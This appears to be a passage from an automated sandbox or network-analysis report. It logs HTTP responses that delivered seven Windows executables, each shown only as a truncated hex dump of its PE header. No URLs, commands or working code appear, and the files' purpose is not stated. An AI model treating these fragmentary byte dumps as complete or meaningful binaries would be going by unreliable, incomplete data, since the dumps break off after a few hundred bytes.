Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:13:50 GMTContent-Type: application/octet-streamContent-Length: 45056Last-Modified: Mon, 02 Sep 2024 16:24:47 GMTConnection: keep-aliveETag: "66d5e6cf-b000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 05 49 ba 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a6 00 00 00 08 00 00 00 00 00 00 8e c4 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a c4 00 00 4f 00 00 00 00 e0 00 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 98 c3 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 a4 00 00 00 20 00 00 00 a6 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 e0 00 00 00 06 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e c4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 31 00 00 b0 18 00 00 01 00 00 00 18 00 00 06 78 4a 00 00 20 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 02 7e 14 00 00 0a 7d 01 00 00 04 02 7e 14 00 00 0a 7d 02 00 00 04 02 7e 14 00 00 0a 7d 03 00 00 04 02 28 15 00 00 0a 02 28 17 00 00 06 02 02 7b 08 00 00 04 74 11 00 00 01 7d 07 00 00 04 2a 36 02 14 73 16 00 00 0a 28 03 00 00 06 2a 00 00 13 30 03 00 3e 00 00 00 01 00 00 11 02 7b 07 00 00 04 72 01 00 00 70 6f 17 00 00 0a 14 16 8d 12 00 00 01 6f 18 00 00 0a 26 02 02 7b 01 00 00 04 17 0a 12 00 28 19 00 00 0a 28 1a 00 00 0a 7d 01 00 00 04 02 28 11 00 00 06 2a 00 00 13 30 03 00 21 00 00 00 01 00 00 11 02 02 7b 01 00 00 04 18 0a 12 00 28 19 00 00 0a 28 1a 00 00 0a 7d 01 00 00 04 02 28 11 00 00 06 2a 00 00 00 13 30 03 00 21 00 00 00 01 00 00 11 02 02 7b 01 00 00 04 19 0a 12 00 28 19 00 00 0a 28 1a 00 00 0a 7d 01 00 00 04 02 28 11 00 00 06 2a 00 00 00 13 30 03 00 21 00 00 00 01 00 00 11 02 02 7b 01 00 00 04 1a 0a 12 00 28 19 00 00 0a 28 1a 00 00 0a 7d 01 00 00 04 02 28 11 00 00 06 2a 00 00 00 13 30 03 00 21 00 00 00 01 00 00 11 02 02 7b 01 00
